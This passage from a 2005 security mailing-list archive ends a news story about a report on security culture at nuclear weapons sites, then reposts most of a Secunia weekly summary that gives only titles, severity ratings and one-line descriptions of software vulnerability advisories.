The study also backs a long-considered proposal that nuclear weapons and materials should be consolidated at fewer, better protected sites. It identifies the isolated, under-utilized Nevada Test Site, 60 miles northwest of Las Vegas, and Idaho National Laboratory as two logical choices for consolidation.

The Test Site is already accepting at its high-security Device Assembly Facility some weapons-grade nuclear materials from the Technical Area 18 site at Los Alamos National Laboratory in New Mexico.

The 121-page report was commissioned by the Energy Department, authored by retired U.S. Navy Adm. Richard Mies. It was made public earlier this month.

Among the report's findings was that the National Nuclear Security Administration, the semi-autonomous agency affiliated with the Energy Department that runs the Test Site, is plagued by cultural problems that hamper security.

The report notes that the problems include:

* The lack of team approach to security.
* An underappreciation of security, which is not fully embraced by everyone as integral to the weapons sites' missions.
* A bias against training.
* A lack of trust in the security organization.
* An absence of accountability.

Security at the Nevada Test Site has been faulted. Security guards in a mock attack exercise in August 2004 rated poorly.

In another instance, an Energy Department audit noted that a guard brought unauthorized handguns to the Test Site during a 2003 training event.

The security firm Wackenhut, which provides security for a number of nuclear plants and other facilities nationwide, has been the contracted security firm at the Test Site since 1965. The firm is being paid $44 million this year.

Wackenhut's current contract expires Sept. 30, and bids are under review, including a Wackenhut bid to continue work. But it is not known when the job award will be announced, spokesman Kevin Rohrer said.

NNSA officials have said the Test Site is secure and that improvements have been made since last year.

The NNSA has already implemented 70 percent of the recommendations from the Mies report, NNSA Administrator Linton Brooks said. He commissioned the study in 2002.

"I believe that security oversight and execution are greatly improved over where we were when I asked for this review," Brooks said in a written statement. "Admiral Mies advised NNSA about his findings as the review was under way and that has helped us get to where we are today."
From isn at c4i.org Fri Sep 16 05:02:11 2005
From: isn at c4i.org (InfoSec News)
Date: Fri Sep 16 05:09:35 2005
Subject: [ISN] Secunia Weekly Summary - Issue: 2005-37
Message-ID:

========================================================================

The Secunia Weekly Advisory Summary
2005-09-08 - 2005-09-15

This week : 82 advisories

========================================================================
Table of Contents:

1.....................................................Word From Secunia
2....................................................This Week In Brief
3..............................This Week's Top Ten Most Read Advisories
4.......................................Vulnerabilities Summary Listing
5.......................................Vulnerabilities Content Listing

========================================================================
1) Word From Secunia:

The Secunia staff is spending hours every day to assure you the best and most reliable source for vulnerability information.

Every single vulnerability report is being validated and verified before a Secunia advisory is written.

Secunia validates and verifies vulnerability reports in many different ways, e.g. by downloading the software and performing comprehensive tests, by reviewing source code, or by validating the credibility of the source from which the vulnerability report was issued.

As a result, Secunia's database is the most correct and complete source for recent vulnerability information available on the Internet.

Secunia Online Vulnerability Database:
http://secunia.com/

========================================================================
2) This Week in Brief:

Tom Ferris has discovered a vulnerability in various Mozilla based browsers, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a user's system.

Please view the referenced Secunia advisories for additional details.

Reference:
http://secunia.com/SA16764
http://secunia.com/SA16766
http://secunia.com/SA16767

VIRUS ALERTS:

Secunia has not issued any virus alerts during the week.

========================================================================
3) This Week's Top Ten Most Read Advisories:

1. [SA16764] Firefox IDN URL Domain Name Buffer Overflow
2. [SA16767] Mozilla IDN URL Domain Name Buffer Overflow
3. [SA16766] Netscape IDN URL Domain Name Buffer Overflow
4. [SA16747] Linux Kernel Multiple Vulnerabilities
5. [SA11762] Opera Browser Favicon Displaying Address Bar Spoofing Vulnerability
6. [SA16480] Microsoft DDS Library Shape Control Code Execution Vulnerability
7. [SA15601] Mozilla / Mozilla Firefox Frame Injection Vulnerability
8. [SA16560] Windows Registry Editor Utility String Concealment Weakness
9. [SA16806] Linksys WRT54G Multiple Vulnerabilities
10. [SA12758] Microsoft Word Document Parsing Buffer Overflow Vulnerabilities

========================================================================
4) Vulnerabilities Summary Listing

Windows:
[SA16778] Mall23 eCommerce "idPage" SQL Injection Vulnerability
[SA16824] Hosting Controller Unspecified Disclosure of Sensitive Information
[SA16798] Handy Address Book Server SEARCHTEXT Cross-Site Scripting
[SA16792] WhatsUp Gold "map.asp" Cross-Site Scripting Vulnerability
[SA16742] COOL! Remote Control Denial of Service Vulnerability

UNIX/Linux:
[SA16815] Debian update for centericq
[SA16814] AzDGDatingLite "l" Local File Inclusion Vulnerability
[SA16797] Debian update for mozilla
[SA16784] Red Hat update for firefox
[SA16782] Red Hat update for mozilla
[SA16780] Fedora update for firefox
[SA16779] Fedora update for mozilla
[SA16772] Ubuntu update for mozilla-browser/mozilla-firefox/mozilla-thunderbird
[SA16743] SGI Advanced Linux Environment Multiple Updates
[SA16828] Red Hat update for squid
[SA16811] Debian update for turqstat
[SA16810] Turquoise SuperStat Date Parser Buffer Overflow
[SA16808] Apple Mac OS X update for Java
[SA16807] Ubuntu update for squid
[SA16804] SUSE Updates for Multiple Packages
[SA16800] Gentoo update for python
[SA16789] Trustix update for multiple packages
[SA16783] GNU Mailutils imap4d "SEARCH" Format String Vulnerability
[SA16781] pam-per-user Cached PAM "subrequest" Vulnerability
[SA16771] Debian update for libapache-mod-ssl
[SA16769] SUSE update for apache2
[SA16768] Debian update for squid
[SA16763] UnixWare update for racoon
[SA16760] Mandriva update for squid
[SA16758] Red Hat update for pcre
[SA16754] Debian update for apache2
[SA16753] Mandriva update for apache2
[SA16752] Textbased MSN Client (TMSNC) Format String Vulnerability
[SA16751] OS/400 osp-cert Certificate Handling Vulnerabilities
[SA16748] Slackware update for mod_ssl
[SA16746] Fedora update for httpd
[SA16787] Debian update for tdiary
[SA16794] Slackware update for dhcpcd
[SA16774] rdiff-backup "--restrict" Security Bypass Vulnerability
[SA16747] Linux Kernel Multiple Vulnerabilities
[SA16823] Debian update for common-lisp-controller
[SA16822] common-lisp-controller Cache Directory Privilege Escalation
[SA16821] Mandriva update for XFree86
[SA16817] LineControl Java Client Log Messages Password Disclosure
[SA16816] GNU Texinfo Insecure Temporary File Creation
[SA16812] Red Hat update for xorg-x11
[SA16803] Ubuntu update for xserver-xfree86/xserver-xorg
[SA16799] Red Hat update for XFree86
[SA16791] Gentoo update for xorg-x11
[SA16790] X11 Pixmap Creation Integer Overflow Vulnerability
[SA16777] XFree86 Pixmap Creation Integer Overflow Vulnerability
[SA16755] Red Hat update for exim
[SA16750] Ubuntu update for kernel
[SA16749] Slackware update for kdebase
[SA16745] Debian update for kdelibs
[SA16825] Fedora update for util-linux
[SA16795] Slackware update for util-linux
[SA16785] util-linux umount "-r" Re-Mounting Security Issue
[SA16765] Debian update for gcvs

Other:
[SA16761] Cisco CSS SSL Authentication Bypass Vulnerability
[SA16806] Linksys WRT54G Multiple Vulnerabilities
[SA16776] Ingate Firewall and SIParator Unspecified Cross-Site Scripting

Cross Platform:
[SA16820] TWiki "rev" Shell Command Injection Vulnerability
[SA16767] Mozilla IDN URL Domain Name Buffer Overflow
[SA16766] Netscape IDN URL Domain Name Buffer Overflow
[SA16764] Firefox IDN URL Domain Name Buffer Overflow
[SA16826] Noah's Classified SQL Injection and Cross-Site Scripting
[SA16819] DeluxeBB SQL Injection Vulnerabilities
[SA16813] ATutor Password Reminder SQL Injection Vulnerability
[SA16802] Sun Java System Application Server JAR File Content Disclosure
[SA16801] PHP-Nuke SQL Injection Vulnerabilities
[SA16796] Subscribe Me Pro "l" Parameter Directory Traversal Vulnerability
[SA16793] Python PCRE Integer Overflow Vulnerability
[SA16788] Zebedee Denial of Service Vulnerability
[SA16786] Snort TCP SACK Option Handling Denial of Service
[SA16775] PunBB Multiple Vulnerabilities
[SA16773] Qt Library zlib Vulnerabilities
[SA16762] class-1 Forum Software File Extension SQL Injection Vulnerability
[SA16757] Sun Java System Web Proxy Server Denial of Service Vulnerabilities
[SA16756] mimicboard2 Script Insertion and Exposure of User Credentials
[SA16830] IBM Lotus Domino "BaseTarget" and "Src" Cross-Site Scripting
[SA16744] Sawmill Error Message Cross-Site Scripting Vulnerability
========================================================================
5) Vulnerabilities Content Listing

Windows:
--
[SA16778] Mall23 eCommerce "idPage" SQL Injection Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2005-09-12

David Sopas Ferreira has reported a vulnerability in Mall23 eCommerce, which can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory: http://secunia.com/advisories/16778/

--
[SA16824] Hosting Controller Unspecified Disclosure of Sensitive Information
Critical: Less critical
Where: From remote
Impact: Exposure of sensitive information
Released: 2005-09-15

A vulnerability has been reported in Hosting Controller, which can be exploited by malicious users to disclose sensitive information.

Full Advisory: http://secunia.com/advisories/16824/

--
[SA16798] Handy Address Book Server SEARCHTEXT Cross-Site Scripting
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2005-09-13

fRoGGz has reported a vulnerability in Handy Address Book Server, which can be exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory: http://secunia.com/advisories/16798/

--
[SA16792] WhatsUp Gold "map.asp" Cross-Site Scripting Vulnerability
Critical: Less critical
Where: From local network
Impact: Cross Site Scripting
Released: 2005-09-12

Dennis Rand has discovered a vulnerability in WhatsUp Gold, which can be exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory: http://secunia.com/advisories/16792/

--
[SA16742] COOL! Remote Control Denial of Service Vulnerability
Critical: Less critical
Where: From local network
Impact: DoS
Released: 2005-09-12

basher13 has discovered a vulnerability in COOL! Remote Control, which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/16742/

UNIX/Linux:
--
[SA16815] Debian update for centericq
Critical: Highly critical
Where: From remote
Impact: System access, DoS
Released: 2005-09-15

Debian has issued an update for centericq. This fixes some vulnerabilities, which potentially can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/16815/

--
[SA16814] AzDGDatingLite "l" Local File Inclusion Vulnerability
Critical: Highly critical
Where: From remote
Impact: Exposure of sensitive information, System access
Released: 2005-09-15

rgod has reported a vulnerability in AzDGDatingLite, which can be exploited by malicious people to disclose sensitive information and compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/16814/

--
[SA16797] Debian update for mozilla
Critical: Highly critical
Where: From remote
Impact: Security Bypass, Cross Site Scripting, Spoofing, System access
Released: 2005-09-13

Debian has issued an update for mozilla. This fixes some vulnerabilities, which can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting and spoofing attacks, and compromise a user's system.

Full Advisory: http://secunia.com/advisories/16797/

--
[SA16784] Red Hat update for firefox
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2005-09-12

Red Hat has issued an update for firefox. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a user's system.

Full Advisory: http://secunia.com/advisories/16784/

--
[SA16782] Red Hat update for mozilla
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2005-09-12

Red Hat has issued an update for mozilla. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a user's system.

Full Advisory: http://secunia.com/advisories/16782/

--
[SA16780] Fedora update for firefox
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2005-09-12

Fedora has issued an update for firefox. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a user's system.

Full Advisory: http://secunia.com/advisories/16780/

--
[SA16779] Fedora update for mozilla
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2005-09-12

Fedora has issued an update for mozilla. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a user's system.

Full Advisory: http://secunia.com/advisories/16779/

--
[SA16772] Ubuntu update for mozilla-browser/mozilla-firefox/mozilla-thunderbird
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2005-09-12

Ubuntu has issued updates for mozilla-browser, mozilla-firefox and mozilla-thunderbird. These fix a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a user's system.

Full Advisory: http://secunia.com/advisories/16772/

--
[SA16743] SGI Advanced Linux Environment Multiple Updates
Critical: Highly critical
Where: From remote
Impact: Security Bypass, Privilege escalation, DoS, System access
Released: 2005-09-08

SGI has issued a patch for SGI Advanced Linux Environment, which fixes multiple vulnerabilities in various packages.

Full Advisory: http://secunia.com/advisories/16743/

--
[SA16828] Red Hat update for squid
Critical: Moderately critical
Where: From remote
Impact: Exposure of system information, Exposure of sensitive information, DoS
Released: 2005-09-15

Red Hat has issued an update for squid. This fixes some vulnerabilities, which can be exploited by malicious people to gain knowledge of potentially sensitive information and potentially cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/16828/

--
[SA16811] Debian update for turqstat
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2005-09-15

Debian has issued an update for turqstat. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a user's system.

Full Advisory: http://secunia.com/advisories/16811/

--
[SA16810] Turquoise SuperStat Date Parser Buffer Overflow
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2005-09-15

A vulnerability has been reported in Turquoise SuperStat, which potentially can be exploited by malicious people to compromise a user's system.

Full Advisory: http://secunia.com/advisories/16810/

--
[SA16808] Apple Mac OS X update for Java
Critical: Moderately critical
Where: From remote
Impact: Hijacking, Security Bypass, Manipulation of data, Privilege escalation
Released: 2005-09-14

Some vulnerabilities have been reported in Java for Mac OS X, which can be exploited by malicious, local users to manipulate certain data, disclose sensitive information and gain escalated privileges, and by malicious people to bypass certain security restrictions.

Full Advisory: http://secunia.com/advisories/16808/

--
[SA16807] Ubuntu update for squid
Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2005-09-13

Ubuntu has issued an update for squid. This fixes two vulnerabilities, which potentially can be exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/16807/

--
[SA16804] SUSE Updates for Multiple Packages
Critical: Moderately critical
Where: From remote
Impact: Unknown, Exposure of sensitive information, DoS, System access
Released: 2005-09-13

SUSE has issued updates for multiple packages. These fix various vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service), gain knowledge of sensitive information and potentially compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/16804/

--
[SA16800] Gentoo update for python
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2005-09-13

Gentoo has issued an update for python. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/16800/

--
[SA16789] Trustix update for multiple packages
Critical: Moderately critical
Where: From remote
Impact: Security Bypass, Privilege escalation, DoS
Released: 2005-09-12

Trustix has issued updates for multiple packages. These fix some vulnerabilities, which can be exploited by malicious users to gain escalated privileges or bypass certain security restrictions and by malicious people to cause a DoS (Denial of Service) or potentially bypass certain security restrictions.

Full Advisory: http://secunia.com/advisories/16789/

--
[SA16783] GNU Mailutils imap4d "SEARCH" Format String Vulnerability
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2005-09-12

A vulnerability has been reported in GNU Mailutils, which can be exploited by malicious users to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/16783/

--
[SA16781] pam-per-user Cached PAM "subrequest" Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Security Bypass
Released: 2005-09-13

A vulnerability has been reported in pam-per-user, which can be exploited by malicious users to bypass certain security restrictions.

Full Advisory: http://secunia.com/advisories/16781/

--
[SA16771] Debian update for libapache-mod-ssl
Critical: Moderately critical
Where: From remote
Impact: Security Bypass
Released: 2005-09-13

Debian has issued an update for libapache-mod-ssl. This fixes a security issue, which potentially can be exploited by malicious people to bypass certain security restrictions.

Full Advisory: http://secunia.com/advisories/16771/

--
[SA16769] SUSE update for apache2
Critical: Moderately critical
Where: From remote
Impact: Security Bypass, Privilege escalation, DoS
Released: 2005-09-12

SUSE has issued an update for apache2. This fixes some vulnerabilities, which can be exploited by malicious, local users to gain escalated privileges and by malicious people to bypass certain security restrictions and cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/16769/

--
[SA16768] Debian update for squid
Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2005-09-13

Debian has issued an update for squid. This fixes some vulnerabilities, which potentially can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/16768/

--
[SA16763] UnixWare update for racoon
Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2005-09-09

SCO has issued an update for racoon. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/16763/

--
[SA16760] Mandriva update for squid
Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2005-09-13

Mandriva has issued an update for squid. This fixes some vulnerabilities, which potentially can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/16760/

--
[SA16758] Red Hat update for pcre
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2005-09-09

Red Hat has issued an update for pcre. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/16758/

--
[SA16754] Debian update for apache2
Critical: Moderately critical
Where: From remote
Impact: Security Bypass, Cross Site Scripting, Manipulation of data, DoS
Released: 2005-09-09

Debian has issued an update for apache2. This fixes three vulnerabilities and a security issue, which can be exploited by malicious people to cause a DoS (Denial of Service), conduct HTTP request smuggling attacks, and potentially bypass certain security restrictions.

Full Advisory: http://secunia.com/advisories/16754/

--
[SA16753] Mandriva update for apache2
Critical: Moderately critical
Where: From remote
Impact: Security Bypass, DoS
Released: 2005-09-09

Mandriva has issued an update for apache2. This fixes a vulnerability and a security issue, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially bypass certain security restrictions.

Full Advisory: http://secunia.com/advisories/16753/

--
[SA16752] Textbased MSN Client (TMSNC) Format String Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Unknown
Released: 2005-09-12

A vulnerability has been reported in TMSNC, with an unknown impact.

Full Advisory: http://secunia.com/advisories/16752/

--
[SA16751] OS/400 osp-cert Certificate Handling Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Unknown
Released: 2005-09-09

Some vulnerabilities have been reported in OS/400, with unknown impacts.

Full Advisory: http://secunia.com/advisories/16751/

--
[SA16748] Slackware update for mod_ssl
Critical: Moderately critical
Where: From remote
Impact: Security Bypass
Released: 2005-09-09

Slackware has issued an update for mod_ssl. This fixes a vulnerability, which potentially can be exploited by malicious people to bypass certain security restrictions.

Full Advisory: http://secunia.com/advisories/16748/

--
[SA16746] Fedora update for httpd
Critical: Moderately critical
Where: From remote
Impact: Security Bypass, DoS
Released: 2005-09-08

Fedora has issued an update for httpd. This fixes a vulnerability and a security issue, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially bypass certain security restrictions.

Full Advisory: http://secunia.com/advisories/16746/

--
[SA16787] Debian update for tdiary
Critical: Less critical
Where: From remote
Impact: Hijacking
Released: 2005-09-13

Debian has issued an update for tdiary. This fixes a vulnerability, which can be exploited by malicious people to conduct cross-site request forgery attacks.

Full Advisory: http://secunia.com/advisories/16787/

--
[SA16794] Slackware update for dhcpcd
Critical: Less critical
Where: From local network
Impact: DoS
Released: 2005-09-13

Slackware has issued an update for dhcpcd. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/16794/

--
[SA16774] rdiff-backup "--restrict" Security Bypass Vulnerability
Critical: Less critical
Where: From local network
Impact: Security Bypass
Released: 2005-09-12

A vulnerability has been reported in rdiff-backup, which can be exploited by malicious users to bypass certain security restrictions.

Full Advisory: http://secunia.com/advisories/16774/

--
[SA16747] Linux Kernel Multiple Vulnerabilities
Critical: Less critical
Where: From local network
Impact: Exposure of sensitive information, Privilege escalation, DoS
Released: 2005-09-09

Some vulnerabilities have been reported in the Linux kernel, which potentially can be exploited by malicious, local users to disclose certain sensitive information, cause a DoS (Denial of Service) and gain escalated privileges, or by malicious people to cause a DoS.

Full Advisory: http://secunia.com/advisories/16747/

--
[SA16823] Debian update for common-lisp-controller
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2005-09-14

Debian has issued an update for common-lisp-controller. This fixes a vulnerability, which can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/16823/

--
[SA16822] common-lisp-controller Cache Directory Privilege Escalation
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2005-09-14

Francois-Rene Rideau has reported a vulnerability in common-lisp-controller, which can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/16822/

--
[SA16821] Mandriva update for XFree86
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2005-09-14

Mandriva has issued an update for XFree86. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/16821/

--
[SA16817] LineControl Java Client Log Messages Password Disclosure
Critical: Less critical
Where: Local system
Impact: Exposure of sensitive information
Released: 2005-09-14

A vulnerability has been reported in LineControl Java Client, which can be exploited by malicious, local users to disclose certain sensitive information.

Full Advisory: http://secunia.com/advisories/16817/

--
[SA16816] GNU Texinfo Insecure Temporary File Creation
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2005-09-15

Frank Lichtenheld has reported a vulnerability in texindex, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges.

Full Advisory: http://secunia.com/advisories/16816/

--
[SA16812] Red Hat update for xorg-x11
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2005-09-14

Red Hat has issued an update for xorg-x11. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/16812/

--
[SA16803] Ubuntu update for xserver-xfree86/xserver-xorg
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2005-09-13

Ubuntu has issued updates for xserver-xfree86 and xserver-xorg. These fix a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/16803/

--
[SA16799] Red Hat update for XFree86
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2005-09-13

Red Hat has issued an update for XFree86. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/16799/

--
[SA16791] Gentoo update for xorg-x11
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2005-09-13

Gentoo has issued an update for xorg-x11. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/16791/

--
[SA16790] X11 Pixmap Creation Integer Overflow Vulnerability
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2005-09-13

A vulnerability has been reported in X11, which potentially can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/16790/

--
[SA16777] XFree86 Pixmap Creation Integer Overflow Vulnerability
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2005-09-13

Luke Hutchison has reported a vulnerability in XFree86, which potentially can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/16777/

--
[SA16755] Red Hat update for exim
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2005-09-09

Red Hat has issued an update for exim. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/16755/

--
[SA16750] Ubuntu update for kernel
Critical: Less critical
Where: Local system
Impact: Security Bypass, Exposure of sensitive information, Privilege escalation, DoS
Released: 2005-09-09

Ubuntu has issued an update for kernel. This fixes some vulnerabilities, which can be exploited by malicious, local users to disclose certain sensitive information, cause a DoS (Denial of Service), bypass certain security restrictions and gain escalated privileges.

Full Advisory: http://secunia.com/advisories/16750/

--
[SA16749] Slackware update for kdebase
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2005-09-09

Slackware has issued an update for kdebase. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/16749/

--
[SA16745] Debian update for kdelibs
Critical: Less critical
Where: Local system
Impact: Exposure of sensitive information
Released: 2005-09-08

Debian has issued an update for kdelibs. This fixes a security issue, which can be exploited by malicious, local users to gain knowledge of certain information.

Full Advisory: http://secunia.com/advisories/16745/

--
[SA16825] Fedora update for util-linux
Critical: Not critical
Where: Local system
Impact: Privilege escalation
Released: 2005-09-15

Fedora has issued an update for util-linux. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/16825/

--
[SA16795] Slackware update for util-linux
Critical: Not critical
Where: Local system
Impact: Privilege escalation
Released: 2005-09-13

Slackware has issued an update for util-linux. This fixes a security issue, which potentially can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/16795/

--
[SA16785] util-linux umount "-r" Re-Mounting Security Issue
Critical: Not critical
Where: Local system
Impact: Privilege escalation
Released: 2005-09-13

David Watson has reported a security issue in util-linux, which potentially can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/16785/

--
[SA16765] Debian update for gcvs
Critical: Not critical
Where: Local system
Impact: Privilege escalation
Released: 2005-09-09

Debian has issued an update for gcvs.
This fixes a security issue, which potentially can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges.

Full Advisory: http://secunia.com/advisories/16765/

Other:
--
[SA16761] Cisco CSS SSL Authentication Bypass Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Security Bypass
Released: 2005-09-09

A vulnerability has been reported in Cisco CSS (Content Services Switch), which can be exploited by malicious users to bypass certain security restrictions.

Full Advisory: http://secunia.com/advisories/16761/

--
[SA16806] Linksys WRT54G Multiple Vulnerabilities
Critical: Moderately critical
Where: From local network
Impact: Security Bypass, DoS, System access
Released: 2005-09-14

Greg MacManus has reported some vulnerabilities in WRT54G, which can be exploited by malicious people to bypass certain security restrictions, cause a DoS (Denial of Service), or compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/16806/

--
[SA16776] Ingate Firewall and SIParator Unspecified Cross-Site Scripting
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2005-09-12

A vulnerability has been reported in Ingate Firewall and Ingate SIParator, which can be exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory: http://secunia.com/advisories/16776/

Cross Platform:
--
[SA16820] TWiki "rev" Shell Command Injection Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2005-09-15

A vulnerability has been reported in TWiki, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/16820/

--
[SA16767] Mozilla IDN URL Domain Name Buffer Overflow
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2005-09-09

A vulnerability has been discovered in Mozilla Suite, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a user's system.

Full Advisory: http://secunia.com/advisories/16767/

--
[SA16766] Netscape IDN URL Domain Name Buffer Overflow
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2005-09-09

A vulnerability has been discovered in Netscape, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a user's system.

Full Advisory: http://secunia.com/advisories/16766/

--
[SA16764] Firefox IDN URL Domain Name Buffer Overflow
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2005-09-09

Tom Ferris has discovered a vulnerability in Firefox, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a user's system.

Full Advisory: http://secunia.com/advisories/16764/

--
[SA16826] Noah's Classified SQL Injection and Cross-Site Scripting
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting, Manipulation of data
Released: 2005-09-15

trueend5 has discovered two vulnerabilities in Noah's Classified, which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks.

Full Advisory: http://secunia.com/advisories/16826/

--
[SA16819] DeluxeBB SQL Injection Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2005-09-15

abducter has discovered some vulnerabilities in DeluxeBB, which can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory: http://secunia.com/advisories/16819/

--
[SA16813] ATutor Password Reminder SQL Injection Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2005-09-15

rgod has discovered a vulnerability in ATutor, which can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory: http://secunia.com/advisories/16813/

--
[SA16802] Sun Java System Application Server JAR File Content Disclosure
Critical: Moderately critical
Where: From remote
Impact: Exposure of sensitive information
Released: 2005-09-14

A vulnerability has been reported in Sun Java System Application Server, which can be exploited by malicious people to disclose certain sensitive information.

Full Advisory: http://secunia.com/advisories/16802/

--
[SA16801] PHP-Nuke SQL Injection Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2005-09-13

Robin Verton has discovered some vulnerabilities in PHP-Nuke, which can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory: http://secunia.com/advisories/16801/

--
[SA16796] Subscribe Me Pro "l" Parameter Directory Traversal Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Exposure of sensitive information
Released: 2005-09-14

ShoCK FX has reported a vulnerability in Subscribe Me Professional, which can be exploited by malicious people to gain knowledge of sensitive information.

Full Advisory: http://secunia.com/advisories/16796/

--
[SA16793] Python PCRE Integer Overflow Vulnerability
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2005-09-13

A vulnerability has been reported in Python, which potentially can be exploited by malicious people to compromise a vulnerable system.
